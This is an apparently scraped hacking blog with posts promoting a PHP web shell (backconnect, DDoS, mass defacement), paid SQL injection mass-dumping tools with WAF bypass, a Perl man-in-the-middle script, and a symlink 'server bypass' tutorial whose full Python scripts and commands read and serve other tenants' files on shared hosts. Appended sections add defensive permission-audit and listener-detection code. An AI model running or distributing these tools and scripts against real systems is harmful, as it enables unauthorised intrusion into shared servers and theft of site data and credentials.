Feb 21, 2015

Juli - Perl MiTM Attack Script

A simple automated Perl script for MiTM (man-in-the-middle) attacks.
It works on Linux as the root user, combined with sslstrip and arpspoof.
The idea of the script is simply to spy on the traffic of devices connected to your network.

The script can be found on GitHub: Juli
And this is the official blog post of the Juli script.
Oct 28, 2012

Alb0zZ Team Shell ░▒▓█►PRIV8 TILL NOW◄█▓▒░ ~ [Unique Features] [FREE]

By a friend, 0x0
-=-=-=-=-=-=-=-=

Some skids leaked the download link, so why don't I share it myself

Author: 0x0


I would like to give credits to:
DevilzCode (perl symlink script)
Syrian Shell (ddos & zone-h)
x-h4ck (Cloudflare ip finder)

Features


3 login attempts
ready commands
execute command
create file
chmod file
file manager
view file
download
rename
delete
upload (choose dir)
turn off magic_quotes_gpc
encode/decode (base64/urlencode/md5/sha1/sha512)
bind/backconnect (5)
get exploit and execute
auto symlink (perl)
eval
mass script deface
processes
zone-h
ddos
mysql connect (unique)
tools (mass mail, Cloudflare, Hide Shell, CMS Fack, List Directory, Text 2 Hex, LFI Dude)
phpinfo
logout
kill shell

Screenshots (images not preserved): Login, Main window, File manager, Htaccess tweaks, Bind/backconnect, symlink, get file (exploit), tools.

NOTE: There are a few encrypted scripts inside the shell; you can decrypt them using encoder tools (not backdoor)


Support download link: http://fileme.us/file/03hrd

Password: yuno

or if you can't download from sharecash

http://adf.ly/DgNoW
Oct 2, 2012

SQLi Dumper v.5.0

SQLi Dumper - Advanced SQL Injection\Scanner Tool

Designed to be automated to find and exploit web security vulnerabilities in mass. It is robust, works in background threads and is super fast.
Uses an advanced search engine with seven different online search services (Google, Yandex, Bing, Yahoo, Sapo, Altavista and Terravista).


SQLi Dumper Features:
 -Supports multiple online search engines (to find the trajects);
 -Automated exploiting and analyzing from a URL list;
 -Automated search for data in a bulk URL list;
 -Automated analyzer for injection points using URL, POST, Cookies, UserLogin or UserPassword;
 -Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
 -Exploiter supports up to 100x threads;
 -Analyzer and Dumper support up to 50x threads;
 -Advanced WAF bypass methods;
 -Advanced custom query box;
 -Dumper can dump large amounts of data, with great control of the delay of each request (multi-threading);
 -Easy switching from vulnerability to vulnerability;
 -Supports proxy lists;
 -GeoIP database;
 -Internal database;
 -Trash System;
 -Admin login finder;
 -Hash online cracker;
 -Reverse IP;
 -Standalone .exe (no install).
SQL Injection Methods supported:
- MySQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - Double Query
  - XPATH - ExtractValue
  - XPATH - UpdateXML
 - Brute Forcing
 - Blind
 - Load File
 - Load File Scanner
 ** Illegal Mix Of Collations:
  - UnHexHex()
  - Binary()
  - Cast As Char
  - Compress(Uncompress())
  - Convert Using utf8
  - Convert Using latin1
  - Aes_decrypt(aes_encrypt())
- MS SQL
 - Union (Integer / String)
 - Error (Integer / String)
 ** Illegal Mix Of Collations:
  - SQL_Latin1;
  - Cast As Char.
- Oracle
 - Union (Integer / String)
 - Error (Integer / String)
 ** Error Methods:
  - GET_HOST_ADDRESS
  - DRITHSX.SN
  - GETMAPPINGXPATH.
 ** Illegal Mix Of Collations:
  - Cast As Char.
 ** Supports TOP N Types:
  - ROWNUM
  - RANK()
  - DENSE_RANK()

** Analyzer also detects:
 - MS Access
 - PostgreSQL
 - Sybase


** To use this tool you should know a little about SQL injection.

Demo Version Limitations:

 - Max. URL per Search 500
 - Get links by ReverseIP DISABLED
 - Max. Trash 5000 URLs
 - SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
 - Exploiter Max. Threads 20
 - Analyzer Max. Threads 3
 - Running multiple instances DISABLED
 - Running multiple mini dump instances DISABLED
 - Dumping Rows with multi-threading DISABLED
 - Network Credential DISABLED
 - Injection Methods for POST, Cookies, etc. DISABLED
 - Proxy DISABLED
 - ReverseIP DISABLED
 - Load_File() scanner DISABLED

 ** Download: http://www.mediafire.com/?vfb8fps2beppsib
 ** Dependencies: Microsoft .NET Framework 4.x
  http://www.microsoft.com/en-us/download/details.aspx?id=17851
 
Price and Payment Method:
 - Binary (EXE): 150 USD / 115€ Euro
 - Source Code (VB.NET 2010): 2.000 USD / 1.550€ Euro
 ** Liberty Reserve

Contacts:

 - mysqlidumper [at] gmail [dot] com (email)
 - c4rl0s@jabber.org (IM Chat)

More Screen Shots:

Aug 13, 2012

MySQLi Dumper | SQLi Injection Tool

MySQLi Dumper is an advanced automated SQL injection tool dedicated to SQL injection attacks on MySQL and MS SQL.
It is designed to be automated to find and exploit web security vulnerabilities in mass.
It is robust, works in background threads and is super fast.

The power of MySQLi Dumper that makes it different from similar tools:
  1. Supports multiple online search engines (to find the trajects);
  2. Automated exploiting and analyzing from a URL list, with a great success rate;
  3. Automated search for column names from a URL list (search for column names 'where like %value%', useful to find e.g. mails);
  4. Dumper supports dumping data with multi-threading (databases/tables/columns/fetching data);
  5. Dumper can dump large data, with great control of the delay per request (multi-threading);
  6. Easy switching from vulnerability to vulnerability;
  7. You can see everything that is loaded by HTTP requests (HTTP Debugger)
Some features:
  1. Online multiple search engine;
  2. Supports MySQL Union, MySQL Error, MS SQL Union, MS SQL Error Integer/String;
  3. Automated Exploiting;
  4. Automated Analyzing;
  5. Trash System (you never exploit the same URL);
  6. Database to collect all vulnerabilities (with option to search for data in mass);
  7. Customized exploiter and analyzer;
  8. GeoIP database;
  9. Small browser you can use to Union Count, view source code and HTTP headers;
  10. Back-end database fingerprint, retrieve DBMS users and password hashes, dump tables and columns, fetching data from the database, running custom SQL statements, supports save/load sessions to XML file;
  11. Brute forcing for MySQL <= 4.x
  12. File dumper for MySQL;
  13. File dumper Scanner for MySQL;
  14. Blind dumper for MySQL;
  15. WAF bypass method;
  16. Supports single proxy or proxy list (random/by order).
  17. Hash online crack;
  18. Admin login finder;
  19. Multi-Threading;
  20. User friendly GUI;
To use this tool you should know a little about SQL injection.
Price 60€ / 74 USD Full version.
Full source code 1000€ / 1227 USD
Accepted payments
- libertyreserve.com
- moneybookers.com (trusted users)
- paypal.com (maybe..)
Dependencies: .NET Framework v.4
Demo Version available (older version only)!
Download: http://www.mediafire.com/?wberio939vwh1ez
Demo Limitations
Max. URL per Search 500
Get links by ReverseIP DISABLED
Max. Trash 5000 URLs
SQL Injection Obfuscate - Bypass Functions and Keywords Filtering DISABLED
Exploiter Max. Threads 20
Analyzer Max. Threads 3
Network Credential DISABLED
Proxy DISABLED
ReverseIP DISABLED
Blinder is disabled in the DEMO EDITION; you can only check Version() in the demo :)
Load_File() scanner DISABLED
If you bought v. 4.x,
email me for a free update!
Contact: mysqlidumper [ at ] gmail [ dot ] com
May 22, 2012

Server Bypass via Symlink - Jumping in server Part 2

Let's continue with the next method of symlink server bypassing. As you saw in the previous post, I will now explain a new trick with another tool.
http://www.flashcrew.in/2012/05/server-bypass-via-symlink-jumping-in.html

-------------------------
Here we will talk about another tool, which uses Python's permissions to read other folders/files on the same server.
The tool is called xplor.py, and here is the source:

#!/usr/bin/env python
# devilzc0de.org (c) 2012
import sys
import os

def copyfile(source, dest, buffer_size=1024*1024):
    if not hasattr(source, 'read'):
        source = open(source, 'rb')
    if not hasattr(dest, 'write'):
        dest = open(dest, 'wb')
    while 1:
        copy_buffer = source.read(buffer_size)
        if copy_buffer:
            dest.write(copy_buffer)
        else:
            break
    source.close()
    dest.close()

if __name__=="__main__":
    if not len(sys.argv) == 3 and not len(sys.argv) == 2:
        sys.stdout.write('usage : python ' + os.path.basename(sys.argv[0]) + ' [path to dir/file] [path to save file]\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue\r\n')
        sys.stdout.write('ex    : python ' + os.path.basename(sys.argv[0]) + ' /etc/issue issue_new_copy\r\n')
        sys.exit(1)
   
    target = sys.argv[1].replace("\\","/")
    if os.path.isdir(target):
        if not target.endswith("/"):
            target = target + "/"
        dir = os.listdir(target)
        for d in dir:
            fs = ""
            if os.path.isdir(target + d):
                fs = "[ DIR ]"
            elif os.path.isfile(target + d):
                fs = os.path.getsize(target + d)
                fs = str(fs)
               
            sys.stdout.write(fs.rjust(12, " ") + " " + d + "\r\n")
    elif os.path.isfile(target):
        if len(sys.argv) == 3:
            copyfile(target, sys.argv[2])
        else:
            f = open(target, "rb")
            try:
                byte = f.read(1024)
                sys.stdout.write(byte)
                sys.stdout.flush()
                while byte != "":
                    byte = f.read(1024)
                    sys.stdout.write(byte)
                    sys.stdout.flush()
            finally:
                f.close()
    else:
        sys.stdout.write("Can't found file or folder : " + target)

http://pastebin.com/WqmCE2sJ

Testing the script:
python xplor.py

Use the tool to view folders that you have no permission to read:

python xplor.py /var/www/index.php


View the files in a no-access folder:
python xplor.py /var/www/index.php


Copy/save your file:
python xplor.py /var/www/indro/ketek.jpg ketek.jpg

And yes, the file is here.

Yeah, fucking access is granted.


You can do the same thing with these other scripts in Perl:
webs.pl
and
xplor.pl


enjoy it :)
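
xplor.py only calls os.listdir() and open(), so it can read exactly what the filesystem permission bits allow the calling account to read. The audit below is an added example (not from the original post or from devilzc0de) that lists entries under a directory of per-site docroots that other users can read or traverse; the function names and the sample tree are constructed for illustration.

```python
import os
import stat
import tempfile

def world_accessible(root):
    """Return (relative path, octal mode) for entries that 'other' users
    can read, or (for directories) traverse."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            st = os.lstat(path)
            if stat.S_ISLNK(st.st_mode):
                continue  # a symlink's own mode bits are not enforced
            mode = stat.S_IMODE(st.st_mode)
            readable = bool(mode & stat.S_IROTH)
            traversable = stat.S_ISDIR(st.st_mode) and bool(mode & stat.S_IXOTH)
            if readable or traversable:
                findings.append((os.path.relpath(path, root), oct(mode)))
    return sorted(findings)

def build_sample_tree():
    """Constructed sample: site_a is locked down, site_b is world-readable."""
    root = tempfile.mkdtemp(prefix="docroots-")
    for site, dmode, fmode in (("site_a", 0o750, 0o640),
                               ("site_b", 0o755, 0o644)):
        d = os.path.join(root, site)
        os.mkdir(d)
        f = os.path.join(d, "config.php")
        with open(f, "w") as fh:
            fh.write("<?php /* constructed sample */ ?>\n")
        os.chmod(f, fmode)
        os.chmod(d, dmode)
    return root

if __name__ == "__main__":
    for rel, mode in world_accessible(build_sample_tree()):
        print(mode, rel)
```

Every path it reports is one that a script run by a neighbouring account on the same host could list or read; tightening those modes (for example 750 on each docroot, owned by the site user with the web server's group) removes them from the output.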

Server Bypass via Symlink - Jumping in server Part 1

As we all know, symlinking is one of the greatest methods for bypassing server security, meaning reading the files of other sites on the same shared host.
To succeed with this tutorial, the following things are required:
  • Python installed on the server
  • b374k.php shell
  • And some scripts you will see below.
This idea started with the devilzc0de geeks; let me explain how it works.


Here we are in the folder /var/www/dono, trying to go into /www/:
no permission to go into /www.
Before you tire yourself out trying commands, you must check whether Python is installed, with the command:
python -h
Now take this Python script and name it webs.py. It is a small Python script that opens a new port on the server using the SimpleHTTPServer (Python) module. The default port in the script is 13123.
#!/usr/bin/env python
# devilzc0de.org (c) 2012
import SimpleHTTPServer
import SocketServer
import os

port = 13123
if __name__=='__main__':
        os.chdir('/')
        Handler = SimpleHTTPServer.SimpleHTTPRequestHandler

        httpd = SocketServer.TCPServer(("", port), Handler)

        print("Now open this server on webbrowser at port : " + str(port))
        print("example: http://maho.com:" + str(port))
        httpd.serve_forever()
http://pastebin.com/PddvszKC 


Next you will need to run the webs.py script with the following command:
python webs.py

Open the site on port 13123:
site.com:13123



And enjoy the symlinking. In the next post I will show you how to do this another way :)
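
webs.py leaves a recognisable footprint on the host: an interpreter process listening on every interface on a non-service port, with its working directory set to /. The check below is an added example (not part of the original post) that looks for that footprint in `ss -H -ltnp` output; the sample lines, the allowed-port list and the function names are constructed assumptions.

```python
import os
import re

# Constructed sample of `ss -H -ltnp` output from a shared web host.
SAMPLE_SS = """\
LISTEN 0 128 0.0.0.0:22 0.0.0.0:* users:(("sshd",pid=801,fd=3))
LISTEN 0 511 *:80 *:* users:(("apache2",pid=950,fd=4),("apache2",pid=951,fd=4))
LISTEN 0 80 127.0.0.1:3306 0.0.0.0:* users:(("mysqld",pid=700,fd=21))
LISTEN 0 5 0.0.0.0:13123 0.0.0.0:* users:(("python",pid=4211,fd=3))
LISTEN 0 5 127.0.0.1:8000 0.0.0.0:* users:(("python3",pid=4300,fd=3))
"""

INTERPRETERS = re.compile(r"^(python|perl)[\d.]*$")  # webs.py / webs.pl
WILDCARDS = {"0.0.0.0", "*", "[::]"}
PROC = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')

def proc_cwd(pid):
    """Working directory of a live process, or None if it cannot be read."""
    try:
        return os.readlink("/proc/%d/cwd" % pid)
    except OSError:
        return None

def suspicious_listeners(ss_output, allowed_ports=(22, 80, 443), cwd_of=proc_cwd):
    """Flag interpreter processes listening on all interfaces on unexpected ports."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")
        if addr not in WILDCARDS or not port.isdigit() or int(port) in allowed_ports:
            continue
        for name, pid in PROC.findall(" ".join(fields[5:])):
            if INTERPRETERS.match(name):
                findings.append({"port": int(port), "process": name, "pid": int(pid),
                                 # webs.py calls os.chdir('/') before serving
                                 "serves_root": cwd_of(int(pid)) == "/"})
    return findings

if __name__ == "__main__":
    for hit in suspicious_listeners(SAMPLE_SS, cwd_of={4211: "/"}.get):
        print(hit)
```

On a live host, feed it the real `ss -H -ltnp` output as root and leave `cwd_of` at its default so the working directory is read from /proc.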
 
FlashcRew Blog